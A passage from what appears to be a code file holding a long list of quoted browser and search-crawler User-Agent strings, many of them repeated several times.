'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)',
'Opera/9.60 (J2ME/MIDP; Opera Mini/4.2.14912/812; U; ru) Presto/2.4.15',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-US) AppleWebKit/125.4 (KHTML, like Gecko, Safari) OmniWeb/v563.57',
'Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaN95_8GB/31.0.015; Profile/MIDP-2.0 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)',
'Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.8.0.5) Gecko/20060706 K-Meleon/1.0',
'Lynx/2.8.6rel.4 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.8g',
'Mozilla/4.76 [en] (PalmOS; U; WebPro/3.0.1a; Palm-Arz1)',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/418 (KHTML, like Gecko) Shiira/1.2.2 Safari/125',
'Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.6) Gecko/2007072300 Iceweasel/2.0.0.6 (Debian-2.0.0.6-0etch1+lenny1)',
'Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 3.5.30729; InfoPath.2)',
'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)',
'Links (2.2; GNU/kFreeBSD 6.3-1-486 i686; 80x25)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; WOW64; Trident/4.0; SLCC1)',
'Mozilla/1.22 (compatible; Konqueror/4.3; Linux) KHTML/4.3.5 (like Gecko)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 6.5)',
'Opera/9.80 (Macintosh; U; de-de) Presto/2.8.131 Version/11.10',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.9) Gecko/20100318 Mandriva/2.0.4-69.1mib2010.0 SeaMonkey/2.0.4',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP) Gecko/20060706 IEMobile/7.0',
'Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10',
'Mozilla/5.0 (Macintosh; I; Intel Mac OS X 10_6_7; ru-ru)',
'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)',
'Mozilla/1.22 (compatible; MSIE 6.0; Windows NT 6.1; Trident/4.0; GTB6; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)',
'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)',
'Mozilla/4.0 (Macintosh; U; Intel Mac OS X 10_6_7; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16',
'Mozilla/1.22 (X11; U; Linux x86_64; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1',
'Mozilla/5.0 (compatible; MSIE 2.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.0.30729; InfoPath.2)',
'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51',
'Mozilla/5.0 (compatible; MSIE 2.0; Windows CE; IEMobile 7.0)',
'Mozilla/4.0 (Macintosh; U; PPC Mac OS X; en-US)',
'Mozilla/5.0 (Windows; U; Windows NT 6.0; en; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7',
'BlackBerry8300/4.2.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/107 UP.Link/6.2.3.15.0',
'Mozilla/1.22 (compatible; MSIE 2.0; Windows 3.1)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)',
'Mozilla/3.0 (Windows NT 6.1; ru-ru; rv:1.9.1.3.) Win32; x86 Firefox/3.5.3 (.NET CLR 2.0.50727)',
'Opera/7.0 (compatible; MSIE 2.0; Windows 3.1)',
'Opera/9.80 (Windows NT 5.1; U; en-US) Presto/2.8.131 Version/11.10',
'Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)',
'Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007',
'BlackBerry9000/5.0.0.93 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/179',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 2.0.50727)',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; de-de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1 (.NET CLR 3.0.04506.648)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)',
'Opera/9.60 (J2ME/MIDP; Opera Mini/4.2.14912/812; U; ru) Presto/2.4.15',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-US) AppleWebKit/125.4 (KHTML, like Gecko, Safari) OmniWeb/v563.57',
'Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaN95_8GB/31.0.015; Profile/MIDP-2.0 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)',
'Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.8.0.5) Gecko/20060706 K-Meleon/1.0',
'Lynx/2.8.6rel.4 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.8g',
'Mozilla/4.76 [en] (PalmOS; U; WebPro/3.0.1a; Palm-Arz1)',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/418 (KHTML, like Gecko) Shiira/1.2.2 Safari/125',
'Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.6) Gecko/2007072300 Iceweasel/2.0.0.6 (Debian-2.0.0.6-0etch1+lenny1)',
'Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 3.5.30729; InfoPath.2)',
'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)',
'Links (2.2; GNU/kFreeBSD 6.3-1-486 i686; 80x25)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; WOW64; Trident/4.0; SLCC1)',
'Mozilla/1.22 (compatible; Konqueror/4.3; Linux) KHTML/4.3.5 (like Gecko)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 6.5)',
'Opera/9.80 (Macintosh; U; de-de) Presto/2.8.131 Version/11.10',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.9) Gecko/20100318 Mandriva/2.0.4-69.1mib2010.0 SeaMonkey/2.0.4',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP) Gecko/20060706 IEMobile/7.0',
'Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10',
'Mozilla/5.0 (Macintosh; I; Intel Mac OS X 10_6_7; ru-ru)',
'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)',
'Mozilla/1.22 (compatible; MSIE 6.0; Windows NT 6.1; Trident/4.0; GTB6; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)',
'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)',
'Mozilla/4.0 (Macintosh; U; Intel Mac OS X 10_6_7; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16',
'Mozilla/1.22 (X11; U; Linux x86_64; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1',
'Mozilla/5.0 (compatible; MSIE 2.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.0.30729; InfoPath.2)',
'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51',
'Mozilla/5.0 (compatible; MSIE 2.0; Windows CE; IEMobile 7.0)',
'Mozilla/4.0 (Macintosh; U; PPC Mac OS X; en-US)',
'Mozilla/5.0 (Windows; U; Windows NT 6.0; en; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7',
'BlackBerry8300/4.2.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/107 UP.Link/6.2.3.15.0',
'Mozilla/1.22 (compatible; MSIE 2.0; Windows 3.1)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)',
'Mozilla/3.0 (Windows NT 6.1; ru-ru; rv:1.9.1.3.) Win32; x86 Firefox/3.5.3 (.NET CLR 2.0.50727)',
'Opera/7.0 (compatible; MSIE 2.0; Windows 3.1)',
'Opera/9.80 (Windows NT 5.1; U; en-US) Presto/2.8.131 Version/11.10',
'Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)',
'Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007',
'BlackBerry9000/5.0.0.93 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/179',
'Mozilla/5.0 (compatible; 008/0.83; http://www.80legs.com/webcrawler.html) Gecko/2008032620',
'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) AddSugarSpiderBot www.idealobserver.com',
'Mozilla/5.0 (compatible; AnyApexBot/1.0; +http://www.anyapex.com/bot.html)',
'Mozilla/4.0 (compatible; Arachmo)', 'Mozilla/4.0 (compatible; B-l-i-t-z-B-O-T)',
'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)',
'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)',
'Mozilla/5.0 (compatible; BecomeBot/2.3; MSIE 6.0 compatible; +http://www.become.com/site_owners.html)',
'BillyBobBot/1.0 (+http://www.billybobbot.com/crawler/)',
'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)',
'Sqworm/2.9.85-BETA (beta_release; 20011115-775; i686-pc-linux-gnu)',
'Mozilla/5.0 (compatible; YandexImages/3.0; +http://yandex.com/bots)',
'Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)',
'Mozilla/5.0 (compatible; YodaoBot/1.0; http://www.yodao.com/help/webmaster/spider/; )',
'Mozilla/5.0 (compatible; YodaoBot/1.0; http://www.yodao.com/help/webmaster/spider/; )',
'Mozilla/4.0 compatible ZyBorg/1.0 Dead Link Checker ([email protected]; http://www.WISEnutbot.com)',
'Mozilla/4.0 compatible ZyBorg/1.0 Dead Link Checker ([email protected]; http://www.WISEnutbot.com)',
'Mozilla/4.0 compatible ZyBorg/1.0 ([email protected]; http://www.WISEnutbot.com)',
'Mozilla/5.0 (compatible; U; ABrowse 0.6; Syllable) AppleWebKit/420+ (KHTML, like Gecko)',
'Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; Acoo Browser 1.98.744; .NET CLR 3.5.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; Acoo Browser; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; Avant Browser)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; Acoo Browser; GTB6; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; InfoPath.1; .NET CLR 3.5.30729; .NET CLR 3.0.30618)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Acoo Browser; .NET CLR 1.1.4322; .NET CLR 2.0.50727)',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/419 (KHTML, like Gecko, Safari/419.3) Cheshire/1.0.ALPHA',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.2 (KHTML, like Gecko) ChromePlus/4.0.222.3 Chrome/4.0.222.3 Safari/532.2',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 ChromePlus/1.5.1.1',
'Links (2.7; Linux 3.7.9-2-ARCH x86_64; GNU C 4.7.1; text)',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/7046A194A',
'Mozilla/5.0 (PLAYSTATION 3; 3.55)', 'Mozilla/5.0 (PLAYSTATION 3; 2.00)',
'Mozilla/5.0 (PLAYSTATION 3; 1.00)',
'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:24.0) Gecko/20100101 Thunderbird/24.4.0',
'Mozilla/5.0 (compatible; AbiLogicBot/1.0; +http://www.abilogic.com/bot.html)',
'SiteBar/3.3.8 (Bookmark Server; http://sitebar.org/)',
'iTunes/9.0.3 (Macintosh; U; Intel Mac OS X 10_6_2; en-ca)',
'iTunes/9.0.3 (Macintosh; U; Intel Mac OS X 10_6_2; en-ca)',
'Mozilla/4.0 (compatible; WebCapture 3.0; Macintosh)',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (FM Scene 4.6.1)',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729) (Prevx 3.0.5) ',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.8.1.8) Gecko/20071004 Iceweasel/2.0.0.8 (Debian-2.0.0.6+2.0.0.8-Oetch1)',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; {1C69E7AA-C14E-200E-5A77-8EAB2D667A07})',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; acc=baadshah; acc=none; freenet DSL 1.1; (none))',
'Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.51',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; snprtz|S26320700000083|2600#Service Pack 1#2#5#154321|isdn)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Alexa Toolbar; mxie; .NET CLR 1.1.4322)',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; ja-jp) AppleWebKit/417.9 (KHTML, like Gecko) Safari/417.8',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.12) Gecko/20051010 Firefox/1.0.7 (Ubuntu package 1.0.7)',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)',
'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)',
'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 2.0.50727)',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; de-de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1 (.NET CLR 3.0.04506.648)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)',
'Opera/9.60 (J2ME/MIDP; Opera Mini/4.2.14912/812; U; ru) Presto/2.4.15',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-US) AppleWebKit/125.4 (KHTML, like Gecko, Safari) OmniWeb/v563.57',
'Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaN95_8GB/31.0.015; Profile/MIDP-2.0 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)',
'Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.8.0.5) Gecko/20060706 K-Meleon/1.0',
'Lynx/2.8.6rel.4 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.8g',
'Mozilla/4.76 [en] (PalmOS; U; WebPro/3.0.1a; Palm-Arz1)',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/418 (KHTML, like Gecko) Shiira/1.2.2 Safari/125',
'Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.6) Gecko/2007072300 Iceweasel/2.0.0.6 (Debian-2.0.0.6-0etch1+lenny1)',
'Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 3.5.30729; InfoPath.2)',
'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)',
'Links (2.2; GNU/kFreeBSD 6.3-1-486 i686; 80x25)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; WOW64; Trident/4.0; SLCC1)',
'Mozilla/1.22 (compatible; Konqueror/4.3; Linux) KHTML/4.3.5 (like Gecko)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 6.5)',
'Opera/9.80 (Macintosh; U; de-de) Presto/2.8.131 Version/11.10',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.9) Gecko/20100318 Mandriva/2.0.4-69.1mib2010.0 SeaMonkey/2.0.4',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP) Gecko/20060706 IEMobile/7.0',
'Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10',
'Mozilla/5.0 (Macintosh; I; Intel Mac OS X 10_6_7; ru-ru)',
'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)',
'Mozilla/1.22 (compatible; MSIE 6.0; Windows NT 6.1; Trident/4.0; GTB6; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)',
'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)',
'Mozilla/4.0 (Macintosh; U; Intel Mac OS X 10_6_7; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16',
'Mozilla/1.22 (X11; U; Linux x86_64; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1',
'Mozilla/5.0 (compatible; MSIE 2.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.0.30729; InfoPath.2)',
'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51',
'Mozilla/5.0 (compatible; MSIE 2.0; Windows CE; IEMobile 7.0)',
'Mozilla/4.0 (Macintosh; U; PPC Mac OS X; en-US)',
'Mozilla/5.0 (Windows; U; Windows NT 6.0; en; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7',
'BlackBerry8300/4.2.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/107 UP.Link/6.2.3.15.0',
'Mozilla/1.22 (compatible; MSIE 2.0; Windows 3.1)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)',
'Mozilla/3.0 (Windows NT 6.1; ru-ru; rv:1.9.1.3.) Win32; x86 Firefox/3.5.3 (.NET CLR 2.0.50727)',
'Opera/7.0 (compatible; MSIE 2.0; Windows 3.1)',
'Opera/9.80 (Windows NT 5.1; U; en-US) Presto/2.8.131 Version/11.10',
'Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)',
'Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007',
'BlackBerry9000/5.0.0.93 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/179',
'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)',
'Googlebot/2.1 (http://www.googlebot.com/bot.html)', 'Opera/9.20 (Windows NT 6.0; U; en)',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.1) Gecko/20061205 Iceweasel/2.0.0.1 (Debian-2.0.0.1+dfsg-2)',
'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; FDM; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 1.1.4322)',
'Opera/10.00 (X11; Linux i686; U; en) Presto/2.2.0',
'Mozilla/5.0 (Windows; U; Windows NT 6.0; he-IL) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16',
'Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.13) Gecko/20101209 Firefox/3.6.13',
'Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 5.1; Trident/5.0)',
'Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727)',
'Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)', 'Mozilla/4.0 (compatible; MSIE 6.0b; Windows 98)',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.8) Gecko/20100804 Gentoo Firefox/3.6.8',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.7) Gecko/20100809 Fedora/3.6.7-1.fc14 Firefox/3.6.7',
'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)',
'Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)',
'YahooSeeker/1.2 (compatible; Mozilla 4.0; MSIE 5.5; yahooseeker at yahoo-inc dot com ; http://help.yahoo.com/help/us/shop/merchant/)',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)',
'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)',
'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51',
'AppEngine-Google; (+http://code.google.com/appengine; appid: webetrex)',
'Mozilla/5.0 (compatible; MSIE 9.0; AOL 9.7; AOLBuild 4343.19; Windows NT 6.1; WOW64; Trident/5.0; FunWebProducts)',
'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.27; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.21; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)',
